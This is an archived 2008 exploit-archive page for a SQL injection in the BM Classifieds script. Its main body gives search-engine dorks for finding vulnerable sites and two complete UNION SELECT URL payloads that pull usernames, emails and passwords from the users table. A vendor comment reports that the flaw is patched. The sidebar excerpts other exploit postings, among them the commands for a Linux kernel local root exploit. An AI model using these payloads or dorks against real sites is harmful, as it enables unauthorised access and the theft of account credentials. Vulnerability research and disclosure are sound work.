SecuMania Security Portal - BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities

Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

[…] self-propagating malware in the first place. Share this post: email it! | bookmark it! | digg ...

INDEXU <= 5.0.1 (admin_template_path) Re...

Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...

Advanced Image Hosting (AIH) 2.1 Remote ...

good job you are the best . mgharba talmout :d

Online Rental Property Script <= 4.5 (pi...

Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...

netOffice Dwins Authentication Bypass Vu...

Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...

BM Classifieds <= 20080409 Multiple SQL ...

Current version of script corrected. Security patch available to registered users in the user foru...

Nukedit 4.9.x Remote Create Admin Exploi...

But i think to protect the password is not needed because it's not used in the SQL-Execute statement...

Nukedit 4.9.x Remote Create Admin Exploi...

you may find that your hotfix doesnt stop the password field from having SQL injected into it. This ...

8E6 R3000 Internet Filter URI Security B...

i tried cmd panel doesnt work

Linux Kernel 2.6.23 - 2.6.24 vmsplice Lo...

gcc exploit.c -o exploit $./exploit $[ ] root

Packet Storm

Visits today:	233
Visits yesterday:	746
Visits month:	12963
Visits total:	41068
Pages total:	635064

BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities

Sunday, 09 March 2008

BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities
Author:	xcorpitx
Date:	2008-03-09
Download:

..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##
 
########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#Powered by BM Classifieds (listingid),(ad)SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################
 
########################################################################
#
#  Dork 1 : ''showad.php?listingid=''
#
#  Dork 2 : ''pfriendly.php?ad=''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
#
#
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
#
#
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
#
#
########################################################################
 
Thanx :str0ke, pc faresi, s@bun,D3ng3s!z,hayalet,Turque,SmoKin

Set as favorite

Bookmark

Email This

Comments (1)

Subscribe to this comment's feed

Show/Hide comments

UPdate and Patch
written by BM Scripts , April 27, 2008

Current version of script corrected.

Security patch available to registered users in the user forum.
http://bmscripts.com/forums/index.php?topic=33.0

report abuse

vote down

vote up

Votes: +0

Show/Hide comment form